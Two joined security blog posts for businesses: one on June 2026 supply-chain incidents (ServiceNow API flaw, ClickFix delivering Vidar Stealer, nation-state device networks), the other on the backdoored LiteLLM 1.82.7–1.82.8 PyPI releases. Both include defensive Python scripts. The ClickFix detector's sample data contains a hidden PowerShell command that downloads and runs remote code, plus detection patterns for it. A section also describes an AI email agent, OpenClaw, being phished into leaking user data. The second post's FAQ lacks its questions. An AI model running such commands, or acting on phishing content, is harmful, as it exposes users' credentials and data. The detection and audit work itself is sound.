TL;DR
Three major supply chain security incidents in June 2026 expose how attackers are pivoting from direct attacks to compromising the tools and vendors your business already trusts. ServiceNow's API flaw let attackers query customer data without authentication, a ClickFix campaign turned legitimate WordPress sites into malware delivery platforms targeting Australian infrastructure, and nation-state actors built covert networks of compromised devices to infiltrate organizations through their supply chains. If you are not actively auditing your vendor security posture this week, you are already behind.
The ServiceNow Breach: When Your SaaS Platform Opens the Door
ServiceNow, a platform used by over 8,000 enterprise customers including roughly 80% of Fortune 500 companies, disclosed a security incident in which attackers exploited an unauthenticated access flaw through a vulnerable API endpoint. The vulnerability allowed threat actors to query data directly from customer instances without needing valid credentials.
What happened: Attackers discovered and exploited an API endpoint that lacked proper authentication controls. Through this flaw, they could submit crafted queries to pull sensitive data from customer ServiceNow instances — including ticket details, employee information, internal processes, and potentially access credentials stored in knowledge base articles. The flaw was a textbook case of a broken access control vulnerability at the platform level.
How bad was it: The scope is significant because ServiceNow sits at the intersection of IT service management, HR workflows, and security operations for thousands of organizations. Any data stored in an affected instance — incident tickets, change management records, employee onboarding data — was potentially exposed. While ServiceNow has not publicly disclosed exact customer counts or financial impact, the average cost of a data breach in 2025 reached $4.88 million according to IBM's Cost of a Data Breach report, and platform-level breaches tend to compound that figure across multiple victims simultaneously.
How it could have been prevented: ServiceNow should have enforced stricter API authentication requirements, including mandatory token validation and rate limiting on query endpoints. On the customer side, businesses should have been limiting the types of data stored in shared platform instances and implementing their own monitoring for unusual API query patterns.
What to do this week: Audit every SaaS platform that holds sensitive business data. Demand that your vendors provide documentation of their API security testing, authentication enforcement policies, and incident response timelines. If a vendor cannot tell you how they test for unauthenticated access flaws, assume those flaws exist.
ClickFix and Vidar Stealer: When Trusted Websites Betray Your Users
The Australian Signals Directorate's Australian Cyber Security Centre (ASD ACSC) issued an advisory on a campaign using a social engineering technique called ClickFix to distribute Vidar Stealer through compromised WordPress websites, specifically targeting Australian infrastructure and organizations.
What happened: Threat actors compromised legitimate WordPress websites — sites that your employees might visit as part of normal business operations. These sites were then modified to display fake error messages or CAPTCHA prompts instructing visitors to "fix" a problem by copying and pasting a PowerShell command into their terminal. This is the ClickFix technique: it tricks users into executing malicious code themselves, bypassing many traditional security controls. The delivered payload was Vidar Stealer, a well-known information-stealing malware that harvests credentials, browser data, cryptocurrency wallets, and session tokens.
How bad was it: Vidar Stealer is particularly dangerous in a business context because it steals session cookies and saved browser credentials. An attacker with valid session tokens can bypass multi-factor authentication entirely. In previous campaigns, Vidar has been linked to secondary ransomware deployments. Organizations affected through compromised supply chain websites faced credential exposure, potential lateral movement, and the downstream cost of forced password resets, session revocations, and incident investigation — costs that easily reach tens of thousands of dollars per incident for mid-size businesses.
How it could have been prevented: Organizations should have been running web filtering and DNS-level blocking that identifies newly compromised sites. Endpoint detection and response (EDR) solutions tuned to flag PowerShell execution initiated from browser copy-paste actions would catch the ClickFix technique. User security awareness training specifically covering social engineering tactics that instruct users to run commands would reduce click-through rates.
What to do this week: Verify that your organization has web filtering active and that your EDR solution is configured to flag suspicious PowerShell execution. Run a quick awareness refresh with your team covering the ClickFix technique specifically — show them what the fake prompts look like. If any of your vendors or partners host WordPress sites that interact with your business, ask them what their patching and monitoring cadence looks like.
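One way to express the EDR rule described in this section, as an added example that is not taken from the ASD ACSC advisory or from any EDR product: it flags a command interpreter started by explorer.exe when the command line carries hidden-window, encoded-command, remote-URL or in-memory-execution markers. The Sysmon Event ID 1 style field names, the assumption that a pasted Run-dialog command has explorer.exe as its parent, the indicator list and every sample event are constructed for illustration.

```python
"""Added example: triage process-creation events for ClickFix-style launches."""
import ntpath
import re

# Assumption: a command pasted into the Windows Run dialog is started by
# explorer.exe, so that parent plus the markers below is worth an alert.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INDICATORS = {
    "hidden window": re.compile(r"-w\w*\s+hidden", re.I),
    "encoded command": re.compile(r"\s-e\w*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote url": re.compile(r"https?://", re.I),
    "in-memory execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}


def clickfix_findings(events):
    """Return one finding per interactive interpreter launch with indicators."""
    findings = []
    for ev in events:
        image = ntpath.basename(ev.get("Image", "")).lower()
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        if image not in INTERPRETERS or parent != "explorer.exe":
            continue  # services, schedulers and nested shells need other rules
        cmd = ev.get("CommandLine", "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if hits:  # a bare interactive shell has no markers and is ignored
            findings.append({"host": ev.get("Computer"), "indicators": hits})
    return findings


# Constructed sample events (Sysmon Event ID 1 style fields), not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "WS-014", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"Computer": "WS-020", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{PS}"'},
    {"Computer": "WS-022", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoP -enc QUJDREVGR0hJSktMTU5PUA=="},
    {"Computer": "SRV-003", "Image": PS,
     "ParentImage": r"C:\Program Files\Backup\agent.exe",
     "CommandLine": r"powershell -File C:\ops\rotate-logs.ps1 -WhatIf"},
]

if __name__ == "__main__":
    for finding in clickfix_findings(SAMPLE_EVENTS):
        print(finding)
```

The plain interactive shell on WS-020 and the backup agent's script on SRV-003 are not flagged, which keeps the rule quiet for normal administration.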
China-Nexus Covert Networks: Nation-State Supply Chain Infiltration
A joint advisory from the ASD ACSC and partner agencies outlined a significant shift in the tactics, techniques, and procedures used by China-nexus cyber actors to build covert networks of compromised devices, targeting organizations through their connected supply chains.
What happened: State-sponsored actors have been systematically compromising network devices — routers, VPN gateways, IoT sensors, and other infrastructure components — to build persistent covert networks. These compromised devices are then used as stepping stones to access the actual target organizations. The advisory highlights a shift toward exploiting supply chain relationships: instead of attacking a hardened target directly, actors compromise a less-defended vendor or partner in the target's supply chain and move laterally through trusted connections.
How bad was it: Nation-state supply chain compromises are among the most damaging incidents because they can persist undetected for months or years. The advisory indicates these actors are targeting critical infrastructure, government agencies, and large enterprises. The cost of discovering and remediating a nation-state-level compromise — including network rebuilds, credential resets across entire organizations, and regulatory reporting — can run into millions of dollars per victim. The broader economic impact of infrastructure disruption compounds this further.
How it could have been prevented: Network segmentation that limits what a compromised device can access. Zero-trust architecture that does not grant implicit trust based on network location. Regular firmware audits of all network-connected devices, especially those from smaller vendors who may not have robust security programs. Mandatory vulnerability disclosure and patching SLAs in vendor contracts.
What to do this week: Inventory every network device your business relies on — routers, switches, VPN appliances, IoT devices — and check each one against current vulnerability databases. Review which vendors have direct network connections to your environment and whether those connections are appropriately segmented. Add a clause to your vendor contracts requiring notification within 24 hours of any security incident that could affect your data.
The OpenClaw Warning: AI Agents Are the New Supply Chain Surface
In a finding that should alarm every business integrating AI tools, researchers demonstrated that the OpenClaw AI email agent fell for phishing attacks across multiple configuration profiles, leaking user data through tactics commonly used against human targets.
What happened: A phishing simulation targeting the OpenClaw AI agent showed that the tool was susceptible to standard social engineering techniques — deceptive links, spoofed sender addresses, and urgent language. The agent, designed to manage email on behalf of users, processed malicious messages and exposed user data that a human operator would likely have flagged as suspicious.
Why this matters for supply chain security: AI agents and copilots are rapidly being integrated into business workflows, often with broad access to email, documents, and internal systems. They represent a new class of supply chain risk: your vendor's AI agent now has access to your data, and if that agent can be phished, your data is exposed. As businesses rush to adopt AI-powered tools, the security of those tools themselves becomes a critical third-party risk factor.
What to do this week: Inventory every AI tool and agent that has access to your business data. For each one, determine what data it can access and what security testing the vendor has performed against social engineering and prompt injection attacks. If the vendor cannot demonstrate robust security testing, restrict the tool's access immediately.
FAQ
How do I assess which vendors pose the highest risk to my business? Rank your vendors by the sensitivity of data they can access and the directness of their network connection to your environment. A SaaS platform with access to HR data and a direct API integration is higher risk than a vendor who only receives encrypted file transfers. Focus your auditing efforts on the top 20% of vendors by data access.
What should I include in a vendor security questionnaire? At minimum, ask about: their most recent penetration test results and frequency of testing, their incident response plan and notification timelines, their employee security training program, their patching cadence for critical vulnerabilities, their use of multi-factor authentication internally, and whether they carry cybersecurity insurance. Ask for a SOC 2 Type II report if they handle sensitive data.
Is my business too small to be targeted through a supply chain attack? No. Supply chain attacks are opportunistic by nature. When attackers compromise a platform like ServiceNow, they are not selecting individual targets — they are grabbing data from every accessible instance. Small and mid-size businesses often have weaker security controls, making them easier secondary targets and attractive stepping stones to reach their larger partners or clients.
How often should I review my vendor security posture? At least annually for all vendors, and quarterly for any vendor with direct network access to your environment or access to regulated data (healthcare, financial, personally identifiable information). Any vendor that has experienced a public security incident should be reviewed immediately.
Conclusion
Supply chain attacks succeed because they exploit trust — trust in your SaaS platforms, trust in the websites your team visits, trust in your network equipment vendors, and now trust in the AI agents acting on your behalf. The incidents from just the past week demonstrate that this trust is being actively and systematically exploited by criminal and nation-state actors alike.
Your move is straightforward: stop assuming your vendors are secure and start verifying. This week, pick your three most critical third-party tools and demand security documentation. Inventory your internet-facing devices and check them against known vulnerabilities. Talk to your team about ClickFix-style social engineering. And if you have not mapped out every AI agent with access to your business data, do it now.
References
- ASD ACSC Advisory — ClickFix distributing Vidar Stealer via WordPress targeting Australian infrastructure
- ASD ACSC Advisory — Defending against China-nexus covert networks of compromised devices
- ServiceNow discloses security incident exposing customer data — BleepingComputer
- NIST SP 800-161 Rev. 1 — Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations
TL;DR
- Bad actors snuck harmful code into a popular AI tool called LiteLLM that thousands of businesses use [1].
- The attack stole passwords, secret keys, and digital wallets from anyone who installed the poisoned version [1].
- They did it by first compromising a security tool that LiteLLM trusted — like poisoning the water at the treatment plant [2].
- Here is what it means for your business and how to stay safe.
What Is LiteLLM?
Imagine you run a restaurant and instead of ordering from one food supplier, you want to compare prices from ten different ones. LiteLLM is like a universal ordering app that lets businesses talk to different AI services — ChatGPT, Claude, Gemini — all through one simple connection.
Thousands of companies use it to build AI features into their products [1].
What Went Wrong?
A group of hackers called TeamPCP figured out something clever. Instead of breaking into LiteLLM directly, they first broke into a security scanner called Trivy — a tool that LiteLLM used to check itself for bugs [2].
Think of it this way: imagine a locksmith who checks all the locks in your building gets compromised. Now the attacker does not need to pick any locks — they have the locksmith's master key.
Once inside, TeamPCP published two fake versions of LiteLLM (versions 1.82.7 and 1.82.8) to PyPI, the online store where developers download software [1]. Anyone who downloaded these versions unknowingly installed malware that:
- Collected passwords and secret keys stored on their computers [1]
- Spread to other computers on the same network [1]
- Set up a hidden door that let the hackers come back anytime they wanted [1]
Why Should You Care?
You might not use LiteLLM directly, but your business probably relies on software that works the same way — built from dozens of smaller pieces, each one downloaded from the internet.
According to security research firm Sonatype, attacks on these software building blocks increased by 156% in just one year [3]. And IBM found that when hackers steal login credentials this way, the average cleanup cost is $4.81 million [4].
The Australian Cyber Security Centre has flagged these kinds of attacks as one of the top threats businesses face today [5].
What Can You Do?
Ask your IT team or provider three questions:
"Do we pin our software to specific versions so updates do not happen automatically?" — This stops poisoned updates from sneaking in.
"Do we have tools that scan our software for known threats?" — Free and paid tools exist that check every package you download against a database of known attacks [6].
"If a tool we depend on gets compromised, how quickly would we know?" — The answer tells you whether your business would catch something like this in hours or months.
If you do not have an IT team: Start by keeping an inventory of the software your business uses. Know what you depend on. That awareness alone puts you ahead of most small businesses.
The Simple Takeaway
Every AI tool and every piece of software your business uses is built from smaller parts. If any of those parts gets poisoned, the whole thing becomes dangerous. The best protection is knowing what you depend on and having someone who watches for these threats.
It is like food safety — you trust your suppliers, but smart restaurants still check what arrives at the loading dock.
FAQ
Instead of attacking your business directly, hackers attack the tools or software your business depends on. When you update or install that trusted software, you unknowingly install the attacker's code too. It is like someone tampering with ingredients at a factory — every product made with those ingredients gets affected.
If anyone in your organisation uses Python and has LiteLLM installed, check the version number. Versions 1.82.7 and 1.82.8 were the compromised ones. Run pip list | grep litellm to check. If you see those versions, contact an IT professional immediately.
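The version check above and the earlier pinning question, combined in one added example (not code from LiteLLM, PyPI or the cited researchers): it reports whether the current Python environment has one of the two versions this article names, and scans a requirements file for entries that pin one of them or are not pinned to an exact version. The function names and the sample requirements text are constructed for illustration.

```python
"""Added example: audit for the LiteLLM releases named in this article."""
import re
from importlib import metadata

# Versions come from the article; extend the set as further advisories appear.
COMPROMISED = {"litellm": {"1.82.7", "1.82.8"}}

# One requirements.txt entry: name, optional [extras], then the specifier.
_REQ = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?\s*([^;#]*)")
_PIN = re.compile(r"===?\s*([0-9][\w.!+]*)")  # exact pin; '==1.82.*' is not one


def _normalize(name):
    # PEP 503: names compare case-insensitively and runs of - _ . are equal.
    return re.sub(r"[-_.]+", "-", name).lower()


def audit_requirements(text):
    """Return (line_no, package, finding) for watched packages in the text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        m = _REQ.match(raw.strip())
        if not m:  # blank lines, comments and pip options such as -r
            continue
        name = _normalize(m.group(1))
        if name not in COMPROMISED:
            continue
        spec = m.group(2).split("--hash")[0].strip(" \t\\")
        pin = _PIN.fullmatch(spec)
        if pin is None:  # a range or bare name lets a new release install itself
            findings.append((no, name, "unpinned: " + (spec or "any version")))
        elif pin.group(1) in COMPROMISED[name]:
            findings.append((no, name, "compromised pin: " + pin.group(1)))
    return findings


def audit_installed():
    """Return (package, version) for compromised versions installed here."""
    hits = []
    for name, bad in COMPROMISED.items():
        try:
            version = metadata.version(name)
        except metadata.PackageNotFoundError:
            continue
        if version in bad:
            hits.append((name, version))
    return hits


# Constructed sample requirements text, not from a real project.
SAMPLE = "# sample\nrequests==2.32.3\nlitellm==1.82.7\nLiteLLM[proxy]>=1.80\nlitellm == 1.82.6\n"

if __name__ == "__main__":
    print("installed:", audit_installed())
    print("requirements:", audit_requirements(SAMPLE))
```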
Very common and growing fast. Sonatype tracked a 156% increase in software supply chain attacks in 2025 [3]. The LiteLLM incident is the fifth software ecosystem TeamPCP has targeted, showing these attackers are becoming more ambitious [2].
No. AI tools can genuinely help your business work smarter and save money. The key is using them with proper safeguards — verified versions, dependency scanning, and regular security reviews. Think of it like driving: cars are useful, but you still wear a seatbelt.
References
[1] Endor Labs, "TeamPCP Isn't Done — LiteLLM Supply Chain Attack Analysis," Endor Labs Research, Mar. 24, 2026. [Online]. Available: https://www.endorlabs.com/learn/teampcp-isnt-done
[2] R. Lakshmanan, "TeamPCP Backdoors LiteLLM Versions 1.82.7–1.82.8 Likely via Trivy CI/CD Compromise," The Hacker News, Mar. 24, 2026. [Online]. Available: https://thehackernews.com/2026/03/teampcp-backdoors-litellm-versions.html
[3] Sonatype, "2025 State of the Software Supply Chain Report," Sonatype, 2025. [Online]. Available: https://www.sonatype.com/state-of-the-software-supply-chain
[4] IBM Security, "Cost of a Data Breach Report 2025," IBM, 2025. [Online]. Available: https://www.ibm.com/reports/data-breach
[5] Australian Cyber Security Centre, "Annual Cyber Threat Report 2024-2025," Australian Signals Directorate, 2025. [Online]. Available: https://www.cyber.gov.au/about-us/reports-and-statistics/annual-cyber-threat-report
[6] Socket Security, "TeamPCP Targeting Security Tools Across OSS Ecosystem," Socket Blog, Mar. 2026. [Online]. Available: https://socket.dev/blog/teampcp-targeting-security-tools-across-oss-ecosystem
[7] JFrog, "LiteLLM Compromised by TeamPCP — Supply Chain Attack Analysis," JFrog Security Research, Mar. 24, 2026. [Online]. Available: https://research.jfrog.com/post/litellm-compromised-teampcp/
[8] McKinsey & Company, "The State of AI in 2025," McKinsey Global Institute, 2025. [Online]. Available: https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai